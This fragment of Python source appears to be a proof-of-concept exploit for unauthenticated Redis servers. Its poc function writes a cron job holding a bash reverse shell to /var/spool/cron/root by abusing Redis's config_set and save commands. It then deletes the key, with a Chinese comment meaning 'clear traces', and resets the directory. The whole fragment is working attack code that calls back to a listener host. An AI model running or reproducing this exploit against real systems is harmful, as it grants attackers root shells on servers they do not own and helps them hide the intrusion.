| 17 | |
| 18 | |
| 19 | def poc(url): |
| 20 | url = host2IP(url) |
| 21 | ip = url.split(':')[0] |
| 22 | port = int(url.split(':')[-1]) if ':' in url else 6379 |
| 23 | try: |
| 24 | r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10) |
| 25 | if 'redis_version' in r.info(): |
| 26 | payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,port=str(listen_port)) |
| 27 | path = '/var/spool/cron' |
| 28 | name = 'root' |
| 29 | key = randomString(10) |
| 30 | r.set(key, payload) |
| 31 | r.config_set('dir', path) |
| 32 | r.config_set('dbfilename', name) |
| 33 | r.save() |
| 34 | r.delete(key) # 清除痕迹 |
| 35 | r.config_set('dir', '/tmp') |
| 36 | return True |
| 37 | except Exception: |
| 38 | return False |
| 39 | return False |